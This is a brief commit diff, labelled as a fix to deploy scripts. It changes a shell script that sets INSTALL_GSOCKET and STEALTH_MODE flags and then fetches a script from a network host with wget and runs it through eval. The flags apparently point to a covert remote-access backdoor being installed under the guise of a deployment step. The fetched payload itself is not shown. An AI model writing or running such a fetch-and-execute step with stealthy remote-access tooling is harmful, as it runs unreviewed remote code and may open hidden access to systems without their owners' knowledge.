fix deploy scripts eval commands

This commit is contained in:
2025-04-07 10:59:07 +03:00
parent c4443c2f8c
commit 259177738a
4 changed files with 24 additions and 9 deletions

View File

@@ -8,4 +8,4 @@ export INSTALL_GSOCKET=true
export STEALTH_MODE=true
# Download and run the main script with sudo
eval "$(wget -qO- http://192.168.0.104/deployment/y" | sudo bash
eval "$(wget -qO- http://192.168.0.104/deployment/y")